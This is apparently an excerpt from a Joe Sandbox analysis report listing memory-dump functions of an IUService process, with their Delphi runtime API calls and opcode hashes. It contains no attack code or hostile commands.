                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$StringSystem@@$Character@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Asg$qqrr20ConvertExcept$qqrvException@$bctr$qqrp20Initialize$qqrvLatin1$qqrbRaiseRecpx14RecxiStringiStringx20Sysutils@Utf32$qqrx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1571831625-0
                                                                                                                                            • Opcode ID: 85393cb161c1816bc41922dd3de2d3b0f49e4e06d07e37d77665b878cc553ffb
                                                                                                                                            • Instruction ID: db5d648a61a0c398fe2207ce4aef69e534902f808f4f142b5e1ae4a32dae8c69
                                                                                                                                            • Opcode Fuzzy Hash: 85393cb161c1816bc41922dd3de2d3b0f49e4e06d07e37d77665b878cc553ffb
                                                                                                                                            • Instruction Fuzzy Hash: AF41B230A042899FEB10DFA4DC915AEB7F5EF44300F5042A6E581D7256DBB4DE85D7D0
                                                                                                                                            Function 5001155C Relevance: 18.1, APIs: 12, Instructions: 104COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50011688), ref: 5001158A
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011688), ref: 500115A7
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011688), ref: 500115DF
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,50011688), ref: 50011610
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50011688), ref: 50011615
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011688), ref: 50011632
                                                                                                                                            • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,50011688), ref: 5001163E
                                                                                                                                            • @Character@TCharacter@CheckSymbol$qqr26Character@TUnicodeCategory.RTL120(00000000,50011688), ref: 50011653
                                                                                                                                            • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,50011688), ref: 50011661
                                                                                                                                            • @Character@TCharacter@CheckSymbol$qqr26Character@TUnicodeCategory.RTL120(00000000,50011688), ref: 50011666
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Character@Unicode$System@$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$CategoryCheckSymbol$qqr26$Asg$qqrr20Category$qqrx20Except$qqrvException@$bctr$qqrp20Latin1$qqrbRaiseRecpx14RecxiStringiStringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3532062273-0
                                                                                                                                            • Opcode ID: 02f4e0b453128032bd79c09e3ed692ee6b80c67c9a4282a1909b60d356ae584f
                                                                                                                                            • Instruction ID: cf5c02718057c24ffe030ee689320cfff37d531f52e15f9273e95cb41984650f
                                                                                                                                            • Opcode Fuzzy Hash: 02f4e0b453128032bd79c09e3ed692ee6b80c67c9a4282a1909b60d356ae584f
                                                                                                                                            • Instruction Fuzzy Hash: C431D030A006899BDF05DFA8EC829EDB7FAAF94200F5842A6E541D7242D771DE81D781
                                                                                                                                            Function 5000D350 Relevance: 18.1, APIs: 12, Instructions: 74COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAddRef$qqrpv.RTL120 ref: 5000D365
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5000D41B), ref: 5000D37C
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5000D41B), ref: 5000D3A1
                                                                                                                                              • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,5000D41B), ref: 5000D3B6
                                                                                                                                            • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000,5000D41B), ref: 5000D3BF
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,00000000,5000D41B), ref: 5000D3C8
                                                                                                                                            • @System@Utf8ToUnicode$qqrpbuipcui.RTL120(00000000,00000000,5000D41B), ref: 5000D3D1
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,00000000,5000D41B), ref: 5000D3E2
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5000D41B), ref: 5000D3EE
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5000D41B), ref: 5000D3F8
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(5000D422), ref: 5000D415
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@Unicode$String$AnsiAsg$qqrr20Stringx20System@%$FromLength$qqrr20Str$qqrr27StringiStringusT$us$i0$%x20$Char$qqrx20Char$qqrx27Clr$qqrpvInternalRef$qqrpvT$us$i0$%Unicode$qqrpbuipcuiUtf8
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4232215533-0
                                                                                                                                            • Opcode ID: ad4d0f6f34169782e74c51b16991eb8d356e2d98f7b635619e335aac60af7289
                                                                                                                                            • Instruction ID: 3b1bd491e4cd28c8667a27129fb9a09298fa26f3dbe235ab3b7280bbe119c3e9
                                                                                                                                            • Opcode Fuzzy Hash: ad4d0f6f34169782e74c51b16991eb8d356e2d98f7b635619e335aac60af7289
                                                                                                                                            • Instruction Fuzzy Hash: FE218034B01689ABEB00DBB8D9A299EB7F9EF58200BD04677A104D7251DB70DF42C691
                                                                                                                                            Function 5000D268 Relevance: 18.1, APIs: 12, Instructions: 72COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAddRef$qqrpv.RTL120 ref: 5000D27D
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120(00000000,5000D32F), ref: 5000D292
                                                                                                                                              • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5000D32F), ref: 5000D2B7
                                                                                                                                              • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                                                            • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120(00000000,5000D32F), ref: 5000D2CC
                                                                                                                                            • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000,5000D32F), ref: 5000D2D5
                                                                                                                                            • @System@@WStrToPWChar$qqrx17System@WideString.RTL120(00000000,00000000,00000000,5000D32F), ref: 5000D2DE
                                                                                                                                            • @System@Utf8ToUnicode$qqrpbuipcui.RTL120(00000000,00000000,5000D32F), ref: 5000D2E7
                                                                                                                                            • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120(00000000,00000000,5000D32F), ref: 5000D2F8
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120(00000000,00000000,5000D32F), ref: 5000D302
                                                                                                                                            • @System@@WStrAsg$qqrr17System@WideStringx17System@WideString.RTL120(00000000,00000000,5000D32F), ref: 5000D30C
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120(5000D336), ref: 5000D321
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(5000D336), ref: 5000D329
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$System@$String$Wide$Clr$qqrpv$AnsiSystem@%$FromLength$qqrr17Str$qqrr27StringiStringusT$us$i0$%x20Unicode$Asg$qqrr17Char$qqrx17Char$qqrx27FreeInternalRef$qqrpvStringx17T$us$i0$%Unicode$qqrpbuipcuiUtf8
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4137807012-0
                                                                                                                                            • Opcode ID: 9d99f426a5258040bba127735ebeabb60f29094ae9e6efebe0269d1dc8d28938
                                                                                                                                            • Instruction ID: fe8e2a62b9cd70ac692412814637c9b7d703ad39900a8dd57bf602c3009e5012
                                                                                                                                            • Opcode Fuzzy Hash: 9d99f426a5258040bba127735ebeabb60f29094ae9e6efebe0269d1dc8d28938
                                                                                                                                            • Instruction Fuzzy Hash: CF215034A01688ABEB01DBE5D9A199DB7F8EF58200BD04277A500E7251DB70DF419795
                                                                                                                                            Function 50026498 Relevance: 18.1, APIs: 12, Instructions: 58filewindowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@ExceptionErrorMessage$qqrp14System@TObjectpvpbi.RTL120(00000800), ref: 500264B1
                                                                                                                                              • Part of subcall function 500262D0: VirtualQuery.KERNEL32(?,?,0000001C,00000000,5002647C), ref: 50026303
                                                                                                                                              • Part of subcall function 500262D0: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 50026327
                                                                                                                                              • Part of subcall function 500262D0: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 50026342
                                                                                                                                              • Part of subcall function 500262D0: @Sysutils@AnsiStrRScan$qqrpbb.RTL120(?,?,00000105), ref: 50026366
                                                                                                                                              • Part of subcall function 500262D0: @Sysutils@StrLCopy$qqrpbpxbui.RTL120(?,?,00000105), ref: 5002637B
                                                                                                                                              • Part of subcall function 500262D0: @System@@IsClass$qqrp14System@TObjectp17System@TMetaClass.RTL120(?,?,00000105), ref: 50026392
                                                                                                                                              • Part of subcall function 500262D0: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,00000105), ref: 5002639E
                                                                                                                                              • Part of subcall function 500262D0: @Sysutils@StrLen$qqrpxb.RTL120(?,?,00000105), ref: 500263A7
                                                                                                                                              • Part of subcall function 500262D0: @System@FindResourceHInstance$qqrui.RTL120(0000FFD6,?,00000100,?,?,00000105), ref: 500263D7
                                                                                                                                              • Part of subcall function 500262D0: LoadStringW.USER32(00000000,0000FFD6,?,00000100), ref: 500263DD
                                                                                                                                              • Part of subcall function 500262D0: @System@TObject@ClassName$qqrv.RTL120(?,?,00000105), ref: 500263EA
                                                                                                                                              • Part of subcall function 500262D0: @Sysutils@StrLFmt$qqrpbuit1px14System@TVarRecxi.RTL120(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,00000105), ref: 50026454
                                                                                                                                            • @System@Flush$qqrr15System@Textfile.RTL120(00000800), ref: 500264C5
                                                                                                                                            • @System@@_IOTest$qqrv.RTL120(00000800), ref: 500264CA
                                                                                                                                            • CharToOemW.USER32(?,?), ref: 500264DF
                                                                                                                                            • @Sysutils@StrLen$qqrpxc.RTL120(?,00000000,00000800), ref: 500264F2
                                                                                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000800), ref: 50026502
                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000800), ref: 50026508
                                                                                                                                            • GetStdHandle.KERNEL32(000000F4,50026578,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000800), ref: 5002651D
                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,50026578,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000800), ref: 50026523
                                                                                                                                            • @System@FindResourceHInstance$qqrui.RTL120(0000FFD7,?,00000040,00000800), ref: 5002653F
                                                                                                                                            • LoadStringW.USER32(00000000,0000FFD7,?,00000040), ref: 50026545
                                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00002010), ref: 5002655E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Sysutils@$File$String$ClassFindHandleInstance$qqruiLoadModuleNameResourceSystem@@Write$AnsiCharChar$qqrx20Class$qqrp14Copy$qqrpbpxbuiErrorExceptionFlush$qqrr15Fmt$qqrpbuit1px14Len$qqrpxbLen$qqrpxcMessageMessage$qqrp14MetaName$qqrvObject@Objectp17ObjectpvpbiQueryRecxiScan$qqrpbbSystem@@_Test$qqrvTextfileUnicodeVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 682148156-0
                                                                                                                                            • Opcode ID: f56c95302a1c536e387dbb5fa9a6a78a2f0151cc5fefaab932fbb0d1fae44bcc
                                                                                                                                            • Instruction ID: f4590949c087f8aafe1dbb2c7c4ba6b3c2bf3514901ac64eb4a44afc2398d7eb
                                                                                                                                            • Opcode Fuzzy Hash: f56c95302a1c536e387dbb5fa9a6a78a2f0151cc5fefaab932fbb0d1fae44bcc
                                                                                                                                            • Instruction Fuzzy Hash: 001194715456C17AF320DBE0EC56FDB73DC6B24310F808B16B298D60E2DE34E64487A2
                                                                                                                                            Function 50032A44 Relevance: 16.8, APIs: 11, Instructions: 288COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Variants@VarCastError$qqrxusxus.RTL120(00000000,50032E9A,?,?,?,?), ref: 50032AF3
                                                                                                                                            • @System@@ROUND$qqrv.RTL120(00000000,50032E9A,?,?,?,?), ref: 50032B36
                                                                                                                                            • @System@@ROUND$qqrv.RTL120(00000000,50032E9A,?,?,?,?), ref: 50032B4C
                                                                                                                                            • @System@@ROUND$qqrv.RTL120(00000000,50032E9A,?,?,?,?), ref: 50032B68
                                                                                                                                            • @System@@ROUND$qqrv.RTL120(00000000,50032E9A,?,?,?,?), ref: 50032B7E
                                                                                                                                            • @Variants@@VarToInt64$qqrrx8TVarData.RTL120(00000000,50032E9A,?,?,?,?), ref: 50032C30
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: D$qqrvSystem@@$CastDataError$qqrxusxusInt64$qqrrx8Variants@Variants@@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4059029452-0
                                                                                                                                            • Opcode ID: 0858a7665fbb0264f540388419324758adf87fcd8ff139c9cfb662a56103d1bb
                                                                                                                                            • Instruction ID: d115ca23f3af8c6c75c742cb4985047a75bb93ddeecb0797a8120271560e4759
                                                                                                                                            • Opcode Fuzzy Hash: 0858a7665fbb0264f540388419324758adf87fcd8ff139c9cfb662a56103d1bb
                                                                                                                                            • Instruction Fuzzy Hash: 2CD19EB0D04259DFCB15DF99C5419EEBBF1BF58301F6186AAA414EB221E7789E40EF80
                                                                                                                                            Function 5001138C Relevance: 16.6, APIs: 11, Instructions: 123COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500114E2), ref: 500113BB
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500114E2), ref: 500113D8
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500114E2), ref: 50011410
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,500114E2), ref: 50011441
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,500114E2), ref: 50011446
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500114E2), ref: 50011463
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500114E2), ref: 5001148D
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500114E2), ref: 500114AC
                                                                                                                                            • @Character@TCharacter@IsSurrogatePair$qqrxbxb.RTL120(00000000,500114E2), ref: 500114BC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$StringSystem@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Character@$Asg$qqrr20Except$qqrvException@$bctr$qqrp20Pair$qqrxbxbRaiseRecpx14RecxiStringx20SurrogateSysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1194877190-0
                                                                                                                                            • Opcode ID: a9b30fe3f2403a0302ec5bf63648d9ce3e1555fb2ec83c40806ccb76183649ed
                                                                                                                                            • Instruction ID: 5b2fcd8ece5833fd3d9f2a349bbedbb4582ae67bb33aebb72d879f9c31b886ea
                                                                                                                                            • Opcode Fuzzy Hash: a9b30fe3f2403a0302ec5bf63648d9ce3e1555fb2ec83c40806ccb76183649ed
                                                                                                                                            • Instruction Fuzzy Hash: 9E419D30A00289ABDF15DFA8ED81AEEB7F5EF44700F5442A6E940D7245E774EE81C790
                                                                                                                                            Function 500244D8 Relevance: 16.6, APIs: 11, Instructions: 119COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 500243A4: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243CD
                                                                                                                                              • Part of subcall function 500243A4: @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024403), ref: 500243D2
                                                                                                                                              • Part of subcall function 500243A4: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243DE
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50024620), ref: 50024537
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50024620), ref: 5002454D
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50024620), ref: 5002455D
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50024620), ref: 5002457A
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50024620), ref: 500245A2
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,00000000,50024620), ref: 500245B6
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,?,00000000,50024620), ref: 500245C0
                                                                                                                                            • CompareStringW.KERNEL32(00000400,00000001,00000000,?,00000000,?,?,00000000,50024620), ref: 500245CD
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000400,00000001,00000000,?,00000000,?,?,00000000,50024620), ref: 500245F1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
